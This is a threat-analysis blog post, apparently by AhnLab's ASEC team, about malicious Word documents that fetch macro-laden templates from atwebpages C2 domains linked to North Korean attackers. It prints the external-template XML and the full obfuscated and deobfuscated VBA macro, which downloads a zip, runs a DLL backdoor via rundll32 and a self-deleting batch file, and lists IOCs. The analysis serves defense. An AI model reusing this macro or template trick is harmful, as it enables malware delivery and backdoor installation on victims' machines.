Malicious Word Files with External Links of Similar Domain Form

Most malicious Word files that have been discovered in attacks contained macro, however, the ASEC analysis team has discovered a case where an external link connecting to an active C2 was used in a superior attack process to execute the malicious Word macro. This method was introduced in a previous blog post and was often used in malicious Word documents with North Korea-related materials.

• Previous blog post: Malicious Word Documents with External Link of North Korea Related Materials

The execution flow of this malicious Word file that operates with the same process as the previous case is as follows:

• Execution flow: Execute the Word file with the malicious XML (connects to External link), then attempts to download additional malicious files → Download Word with malicious macro → Download additional malicious PE backdoor via macro

The URL that was used to connect to an external link this time was a URL that uses a specific domain atwebpages[.]com which was often used by the North Korean attack group. The following is the record of cases that used the “kr[Number].atwebpages[.]com” form.

Table 1. Filenames of malicious Word files that use the “kr[Number].atwebpages[.]com” format

The file discovered this time is in the form of XML as shown below, and it attempts to connect to “hxxp://kr9235.atwebpages[.]com/view.php?id=1” and downloads additional malicious macro Word files.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="http://kr9235.atwebpages.com/view.php?id=1" TargetMode="External"/></Relationships>

The macro of the downloaded Word file is obfuscated and attempts to download additional macro (see below).

Sub Macro1(df)
    On Error Resume Next
    rp = df & "\cv" & CQka & "wiq" & MnkuM & ".zi" & MnkuM & "p"
    ui = "htt" & CQka & "p:/" & MnkuM & "/kr" & MnkuM & "923" & CQka & "5.a" & MnkuM & "twe" & CQka & "bpa" & CQka & "ges" & CQka & ".co" & CQka & "m/v" & CQka & "iew" & CQka & ".ph" & MnkuM & "p?id" & CQka & "=2"
    DownloadFile ui, rp
    UnZipFile df, rp, "wie" & CQka & "b.d" & CQka & "at"
    Set fso = CreateObject("Scr" & CQka & "ipt" & CQka & "ing" & MnkuM & ".Fi" & CQka & "leS" & CQka & "yst" & MnkuM & "emO" & MnkuM & "bje" & CQka & "ct")
    fso.DeleteFile rp
    btTxt = "run" & CQka & "dll" & MnkuM & "32." & MnkuM & "exe" & CQka & " """ & df & "\wi" & MnkuM & "eb." & MnkuM & "dat" & MnkuM & """ " & CQka & "Run" & vbNewLine & "del" & MnkuM & " /f" & CQka & " /q" & MnkuM & " %0"
    WriteTextFile df & "\nw" & CQka & "ib." & MnkuM & "bat", btTxt, "asc" & MnkuM & "ii"
    
    Set wmObjStart = GetObject("win" & MnkuM & "mgm" & CQka & "ts:" & CQka & "win" & CQka & "32_" & CQka & "Pro" & CQka & "ces" & CQka & "sSt" & MnkuM & "art" & MnkuM & "up")
    Set objConfig = wmObjStart.SpawnInstance_
    objConfig.ShowWindow = 0
    
    
    Set wmObj = GetObject("win" & CQka & "mgm" & CQka & "ts:" & CQka & "win" & CQka & "32_" & MnkuM & "pro" & CQka & "ces" & MnkuM & "s")
    res = wmObj.Create(df & "\nw" & CQka & "ib." & MnkuM & "bat", Null, objConfig, pid)
End Sub
Sub AutoOpen()
    On Error Resume Next
    Application.ActiveWindow.View.Type = wdPrintView
    Set wnd = ActiveDocument
    wnd.Unprotect "6tf" & CQka & "c&Y" & CQka & "GV"
    ViewPage ("xxx")
    wnd.Save
    Set ob_tmp = Application.Templates
    Dim tmp As Template
    For Each tmp In ob_tmp
    If tmp.Type = 0 Then
        Macro1 (tmp.Path)
        Exit For
    End If
    Next
End Sub

Considering that the macro code removes the protection with a certain password to attempt the export of the file details, it appears that the file with the XML above contains a specific material.

Sub Macro1(df)
    On Error Resume Next
    rp = df & "\cvwiq.zip"
    ui = "http://kr9235.atwebpages.com/view.php?q=2"
    DownloadFile ui, rp
    UnZipFile df, rp, "wieb.dat"
    Set fso = CreateObject("Scripting.FileSystemObject")
    fso.DeleteFile rp
    btTxt = "rundll32.exe """ & df & "\wieb.dat"" Run" & vbNewLine & "del /f /q %0"
    WriteTextFile df & "\nwib.bat", btTxt, "ascii"
    
    Set wmObjStart = GetObject("winmgmts:win32_ProcessStartup")
    Set objConfig = wmObjStart.SpawnInstance_
    objConfig.ShowWindow = 0

As shown in the unobfuscated code above, it operates in the following order, and the ultimately downloaded PE performs the backdoor feature.

• Order of execution: Remove protection from file → Delete inserted picture file → Enable hidden text → Download additional compressed file cvwiq.zip from “hxxp://kr9235.atwebpages[.]com/view.php?q=2” and decompress → Execute decompressed malicious DLL that is decompressed via wieb.dat rundll32.exe

Although the team could not obtain the downloaded macro for “[Confidential]For Review.docx” file (See table 1), it is assumed that it will download a Word file similar to the type of macro above and operate. This is because the file is also protected and contains a specific picture and text. However, as shown below, the file uses a Chinese font called SimSun so that the Office environment is also run in Chinese upon analysis.

<w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>

As explained above, the file is protected and contains the same picture like the one shown in figure 1. The ASEC analysis team has manually removed the protection from this file via the password obtained through analysis up until now and attempted to delete the picture and enable the protected text. Unfortunately, the text appeared to be in a test form as the content could not be enabled normally even in a Chinese environment.

As the team has obtained evidence that malicious files using the same attack flow as the previous ones are being developed, AhnLab will continuously monitor such types of malicious Word files.

Therefore, users should refrain from opening files from unknown sources and update V3 to the latest version to prevent malware infection in advance.

[File Detection]
Downloader/XML.External
Downloader/DOC.Akdoor

[IOC]
6757787a71561abdf0327e665eb17e8d
4a5661ef2612c914a2ad5c1b6cf98ba1
hxxp://kr4952.atwebpages[.]com/view.php?id=1
hxxp://kr7593.atwebpages[.]com/view.php?id=1
hxxp://kr2959.atwebpages[.]com/view.php?id=1
hxxp://kr9235.atwebpages[.]com/view.php?id=1
hxxp://kr9235.atwebpages[.]com/view.php?q=2

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.